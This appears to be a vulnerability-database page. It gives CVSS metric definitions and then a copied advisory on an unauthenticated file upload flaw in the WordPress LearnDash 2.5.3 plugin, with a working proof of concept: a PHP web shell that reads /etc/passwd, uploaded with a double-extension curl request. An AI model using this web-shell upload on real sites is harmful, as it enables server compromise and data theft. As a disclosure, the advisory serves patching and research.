The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: WordPress Plugin LearnDash 2.5.3 Arbitrary File Upload
# Exploit Title: WordPress LearnDash 2.5.3 Unauthenticated Arbitrary
File Upload
# Date: 07-01-2018
# Vendor Homepage: https://www.learndash.com/
# Vendor Changelog: https://www.learndash.com/changelog/
# Version: 2.5.3
# Exploit Author: NinTechNet
# Author Advisory: http://nin.link/learndash/
# Category: Webapps
1. Overview:
This vulnerability has been exploited at least since Dec. 27th, 2017.
Here's a log sample showing the attack:
87.244.138.44 - - [27/Dec/2017:20:29:33 +0100] "POST / HTTP/1.0" 200
47095
87.244.138.44 - - [27/Dec/2017:20:29:34 +0100] "GET
/wp-content/uploads/assignments/assig.php. HTTP/1.1" 200 266
87.244.138.44 - - [27/Dec/2017:20:29:36 +0100] "GET
/wp-admin/ms-site.php HTTP/1.1" 200 4110
2. Description:
The plugin offers the possibility to create courses and to assign
lessons to them. Each lesson can allow uploads, and it is possible to
restrict them by file extensions. Uploads are handled by the
learndash_assignment_process_init() function located in the
"wp-content/plugins/sfwd-lms/includes/ld-assignment-uploads.php" script:
// ===================================================================
function learndash_assignment_process_init() {
if ( isset( $_POST['uploadfile'] ) && isset( $_POST['post'] ) ) {
$post_id = $_POST['post'];
$file = $_FILES['uploadfiles'];
if (( ! empty( $file['name'][0] ) ) && ( learndash_check_upload(
$file, $post_id ) ) ) {
$file_desc = learndash_fileupload_process( $file, $post_id );
$file_name = $file_desc['filename'];
$file_link = $file_desc['filelink'];
$params = array(
'filelink' => $file_link,
'filename' => $file_name,
);
}
}
}
// ===================================================================
Neither this function nor the learndash_check_upload() and
learndash_fileupload_process() functions it calls check if the user is
authenticated or allowed to upload files, or even if the post ID, course
and lesson exist before accepting the file.
The plugin calls the WordPress wp_check_filetype() API function, removes
the filename extension and appends the one returned by this function.
Because wp_check_filetype() will return an empty value for PHP scripts,
the file extension will be removed: "script.php" will become "script.".
But that can be bypassed by appending a double extension, e.g.,
"script.php.php" which will be turned into "script.php.". Although the
PHP filename ends with a [.] dot, it is still executed by default by the
PHP interpreter on servers running Apache with PHP CGI/FastCGI SAPI.
3. Proof of concept:
To exploit the vulnerability, it is only required that the plugin be
enabled, even if no courses or lessons were created (bogus values can be
assigned to each variable):
$ echo '<?php echo exec("ls -la /etc/passwd");' > shell.php.php
$ curl -F "post=foobar" -F "course_id=foobar" -F "uploadfile=foobar" -F
"uploadfiles[]=@./shell.php.php" http://victim.tld/
$ curl 'http://victim.tld/wp-content/uploads/assignments/shell.php.'
-rw-r--r-- 1 root root 2385 Apr 14 2017 /etc/passwd
4. Timeline:
Authors were informed on January 2nd and released version 2.5.4 on January 3rd.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum